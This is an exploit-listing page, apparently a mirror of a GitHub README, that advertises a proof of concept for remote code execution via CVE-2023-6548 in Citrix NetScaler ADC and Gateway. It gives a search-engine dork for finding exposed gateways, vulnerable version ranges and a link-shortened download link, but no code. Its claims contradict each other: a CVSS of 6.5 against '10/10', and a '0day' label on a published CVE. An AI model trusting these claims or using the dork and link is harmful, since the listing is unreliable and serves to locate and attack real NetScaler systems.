Exploit for Code Injection in Citrix Netscaler Application Delivery Controller CVE-2023-6548

Name: Exploit for Code Injection in Citrix Netscaler Application Delivery Controller CVE-2023-6548
Rating: 5 (96 reviews)

2024-03-04 | CVSS 6.5

## https://sploitus.com/exploit?id=CE757950-B79E-5E76-B674-D8980738618A
# CVE-2023-6548-POC
0day for Citrix Netscaler ADC and NetScaler Gateway latest versions

## 🔥 **CVSS: 10/10**

## Description
A vulnerability has been discovered in Citrix Gateway and Citrix ADC (formerly known as NetScaler ADC) that, if exploited, could lead to remote code execution on Management Interface.

## Exploit details
The exploit implements an improper code generation control vulnerability ("code injection") in NetScaler ADC and NetScaler Gateway and allows access (RCE) to an NSIP, CLIP, or SNIP with a management interface to perform authenticated (low-privilege) remote code execution on the management interface.


![image](https://github.com/Roonye660/CVE-2023-6548-POC/assets/162106909/5e46892a-1b70-4bbf-ad4f-b41595edf9ca)

## Zoomeye dork
```app:"Citrix NetScaler Gateway"```

## Vulnerable versions: 
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35<br>
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15<br>
NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21<br>
NetScaler ADC 13.1-FIPS before 13.1-37.176<br>
NetScaler ADC 12.1-FIPS before 12.1-55.302<br>
NetScaler ADC 12.1-NDcPP before 12.1-55.302<br>

## Download
[Download here](https://t.ly/vZp93)

## Date of published: 2024/03/04

## Contact
Author: Roonye660

For education purposes only.